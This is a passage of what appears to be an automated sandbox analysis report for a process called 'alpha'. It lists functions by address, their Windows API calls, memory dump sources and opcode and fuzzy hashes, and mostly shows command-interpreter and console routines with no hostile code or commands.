                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,00EE80F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00EF1D57
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF1CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00EE80F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00EF1D61
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF01F5: wcsrchr.MSVCRT ref: 00EF01FB
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Error$Mode$AttributesCriticalFileHeapLastSection_wcsicmpmemset$AllocCurrentDirectoryEnterFullLeaveNamePathProcessfflushfprintflongjmpwcsrchr
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3753564779-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 9aa277da98e1b24ecf0c54cfdcd4efda187569cfd180b779a8068b3d8b3dfbb8
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: cbeac47a1630da2a1452d2640b9bd78ba0491359b70500064f7e512fc0053504
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9aa277da98e1b24ecf0c54cfdcd4efda187569cfd180b779a8068b3d8b3dfbb8
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1511030A0121DDBDB24ABB5ED56ABB77F0EF04314F142429EA0AF7291EF308981DB51
                                                                                                                                                                                                                                                                                                                                                      Function 00F08B6C Relevance: 13.6, APIs: 9, Instructions: 93fileCOMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00F08B7B
                                                                                                                                                                                                                                                                                                                                                      • FlushFileBuffers.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00F09323,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00F08B83
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEA16C: _close.MSVCRT ref: 00EEA19B
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00F08BB5
                                                                                                                                                                                                                                                                                                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00F08BBD
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00F08BCF
                                                                                                                                                                                                                                                                                                                                                      • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00F08BD7
                                                                                                                                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,?,?), ref: 00F08BED
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF654B: _wcsicmp.MSVCRT ref: 00EF65A4
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF654B: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 00EF65D7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF654B: _open_osfhandle.MSVCRT ref: 00EF65EB
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF654B: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?), ref: 00F02092
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00F08C1A
                                                                                                                                                                                                                                                                                                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00F08C22
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: File$_get_osfhandle$Pointer$BuffersCloseCreateFlushHandleRead_close_open_osfhandle_wcsicmpmemcmp
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 4208585293-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 779c722b2d5318670e61c403ffdcb3a94b27bfbc749515d59bd2590d82221dcc
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 8d0fb0f995349d235fb5d2c9513f690ee271968cc5303daf994148871146d28a
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 779c722b2d5318670e61c403ffdcb3a94b27bfbc749515d59bd2590d82221dcc
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F21A671600109BFF728AF71DC4DF7A7AA9EF84360F24452CF591D61E1EE719C02A621
                                                                                                                                                                                                                                                                                                                                                      Function 00EF38D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 247COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                                                                                                                                      • String ID: %s
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2221118986-3043279178
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 6a3d7540f40ebdcbff5c15d5c47d310d6fa3ca74a4bbd3b5f1a22fa762cb26e2
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 8030b03718c8edf1dab88e099ff26b2ebfe72235e2055a5266fd3dc69691951e
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a3d7540f40ebdcbff5c15d5c47d310d6fa3ca74a4bbd3b5f1a22fa762cb26e2
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6091B47160838A9BD734DF61C885BBBB3E4BF94308F00592DE6C9A7191EB74DA04CB52
                                                                                                                                                                                                                                                                                                                                                      Function 00EEBF70 Relevance: 12.4, APIs: 8, Instructions: 447COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000), ref: 00EEDCE1
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEDCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00EEACD8,00000001,?,00000000,00EE8C23,-00000105,00F0C9B0,00000240,00EF1E92,00000000,00000000,00EFACE0,00000000,00000000), ref: 00EEDCE8
                                                                                                                                                                                                                                                                                                                                                      • _wcsnicmp.MSVCRT ref: 00EEC1B7
                                                                                                                                                                                                                                                                                                                                                      • wcstol.MSVCRT ref: 00EEC1FC
                                                                                                                                                                                                                                                                                                                                                      • wcstol.MSVCRT ref: 00EEC28A
                                                                                                                                                                                                                                                                                                                                                      • longjmp.MSVCRT(?,000000FF), ref: 00EFCFB0
                                                                                                                                                                                                                                                                                                                                                      • longjmp.MSVCRT(?,000000FF), ref: 00EFCFC4
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Heaplongjmpwcstol$AllocProcess_wcsnicmp
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2863075230-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 5ee6b2209cc7edd91b02e0bf5454d58c14d779a109fa3dcc5d7a38d62bb506e2
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 927bcf3b1427b68a02f829c703d0f822b37784753a7f0743cfaf18fb2667160a
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ee6b2209cc7edd91b02e0bf5454d58c14d779a109fa3dcc5d7a38d62bb506e2
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5CF19E76D0025D8BCB28DF99C8906FEB7B1AF88704F39925AD916B7390E7715D02CB90
                                                                                                                                                                                                                                                                                                                                                      Function 00EF26DC Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 193COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EF2795
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEE3F0: memset.MSVCRT ref: 00EEE455
                                                                                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00EF280E
                                                                                                                                                                                                                                                                                                                                                      • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,00000000,00000000,00000000,00000104,-00000001,?,00000002,00000000), ref: 00EF281D
                                                                                                                                                                                                                                                                                                                                                      • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,?,?,00000000), ref: 00EF2857
                                                                                                                                                                                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,00000002,00000000), ref: 00EF290B
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: memset$EnvironmentVariable
                                                                                                                                                                                                                                                                                                                                                      • String ID: DIRCMD
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1405722092-1465291664
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 9c5c061763b28995273304d469754fbe6202df469ac80f8d9428173626cf9b51
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 82bea4a09852ecec0a38824ce8bda3f632c73423be76fbeaf51911e4f643c7b9
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c5c061763b28995273304d469754fbe6202df469ac80f8d9428173626cf9b51
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 627138B1A0D3859BD368DF29C884AABBBE4BFD4344F10592EF699D3250DB308904CB57
                                                                                                                                                                                                                                                                                                                                                      Function 00EF31EA Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: wcschr$iswdigit
                                                                                                                                                                                                                                                                                                                                                      • String ID: +-~!$<>+-*/%()|^&=,
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2770779731-632268628
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: dc3d196b0716b83ed1f5a19bb1a4f94039ffdef0e4e970c338437aa876146c60
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 5051747d411923dba89992f80cf1407cf4f8129a0afefcc340d562d5f06272b3
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc3d196b0716b83ed1f5a19bb1a4f94039ffdef0e4e970c338437aa876146c60
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8811CE3220425A9FA7349FBEE85487677ECFF9A764320142EF680E7260EB31CD019621
                                                                                                                                                                                                                                                                                                                                                      Function 00EE49F8 Relevance: 12.2, APIs: 8, Instructions: 187COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9A11: _get_osfhandle.MSVCRT ref: 00EE9A1C
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00EE793A,00000104,?), ref: 00EE9A2B
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374,-00000001), ref: 00EE9A47
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374), ref: 00EE9A56
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374), ref: 00EE9A61
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00F28E04,?,?,?,?,?,?,?,?,?,?,?,?,00EE7908,00002374,-00000001), ref: 00EE9A6A
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EF86E3
                                                                                                                                                                                                                                                                                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00EF86EB
                                                                                                                                                                                                                                                                                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002), ref: 00EF872A
                                                                                                                                                                                                                                                                                                                                                      • _get_osfhandle.MSVCRT ref: 00EF8743
                                                                                                                                                                                                                                                                                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00EF874B
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9B3B: _get_osfhandle.MSVCRT ref: 00EE9B4E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9B3B: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00F20AF0,000000FF,00F1A7F0,00002000,00000000,00000000), ref: 00EE9B8E
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EE9B3B: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00F1A7F0,-00000001,?,00000000), ref: 00EE9BA3
                                                                                                                                                                                                                                                                                                                                                      • longjmp.MSVCRT(00F20A30,00000001), ref: 00EF87CE
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Console_get_osfhandle$Write$FileLockModeShared$AcquireByteCharHandleMultiReleaseTypeWidelongjmp
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1333215474-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 93d57310f05870d344921d254ce2a7f1d55341ef71a3b6dd483c4336f025e128
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: eba6982a8e8a7437146e8d37edd9c3433e1269955bfe1cbb1d2c7ee7705db121
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93d57310f05870d344921d254ce2a7f1d55341ef71a3b6dd483c4336f025e128
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0551C370B00309ABDB24FB75D94AB7EB3A4EB00715F10592AE606F71C1EB74DD41CA50
                                                                                                                                                                                                                                                                                                                                                      Function 00EE6150 Relevance: 10.8, APIs: 7, Instructions: 264COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBCA7
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: iswspace.MSVCRT ref: 00EEBD1D
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD39
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EEBC30: wcschr.MSVCRT ref: 00EEBD5D
                                                                                                                                                                                                                                                                                                                                                      • iswspace.MSVCRT ref: 00EE61E4
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: wcschr$iswspace
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3458554142-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 1dae6f9aca4d73e40af1009598af5a274e515b8d2da1acd088b2ef76dc41786b
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ebc573163f8fd064915a910bedbb6e82e0093ae0a4cbbe56b1340d548997520a
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1dae6f9aca4d73e40af1009598af5a274e515b8d2da1acd088b2ef76dc41786b
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B91CB70A0024C9BDB24DF6AEC01ABAB7F5FF58344F14902AE946E72A1EB315841DB55
                                                                                                                                                                                                                                                                                                                                                      Function 00EEA6A0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 191COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432728211.0000000000F2E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_ee0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                                                                                                                                                                                                                      • String ID: ELSE$IF/?
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2081463915-1134991328
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 19b06d225bc41fa05f22ca205c8d9613f6e561a95de02d598117a8b1c7b7d255
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: ebe31d8fabf203555fce8cd63e20e7962232098a6216619433d20bcf275db782
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19b06d225bc41fa05f22ca205c8d9613f6e561a95de02d598117a8b1c7b7d255
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6051283260438E8AE734DB36AC56B7633E59B80354F39743EE641B60D1EBB5E841DB12
                                                                                                                                                                                                                                                                                                                                                      Function 00EF62C0 Relevance: 10.7, APIs: 7, Instructions: 171COMMON
                                                                                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF643A: NtOpenThreadToken.NTDLL ref: 00EF6454
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF643A: NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 00EF646C
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF643A: NtClose.NTDLL ref: 00EF64BD
                                                                                                                                                                                                                                                                                                                                                      • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000), ref: 00EF63B5
                                                                                                                                                                                                                                                                                                                                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00EF63E3
                                                                                                                                                                                                                                                                                                                                                      • RtlNtStatusToDosError.NTDLL ref: 00F01EF4
                                                                                                                                                                                                                                                                                                                                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00F01EFB
                                                                                                                                                                                                                                                                                                                                                      • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,?,000000FF,00000002,00000000), ref: 00F01F6B
                                                                                                                                                                                                                                                                                                                                                      • wcsstr.MSVCRT ref: 00F01F86
                                                                                                                                                                                                                                                                                                                                                      • wcsstr.MSVCRT ref: 00F01FA4
                                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00EF640A: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,00000000,?,?,?,?,00F09C96,00EFFDFA,00000000,?), ref: 00EF642F
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432651828.0000000000EE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000007.00000002.1432703439.0000000000F0E000.00000004.00000001.01000000.00000006.sdmpDownload File
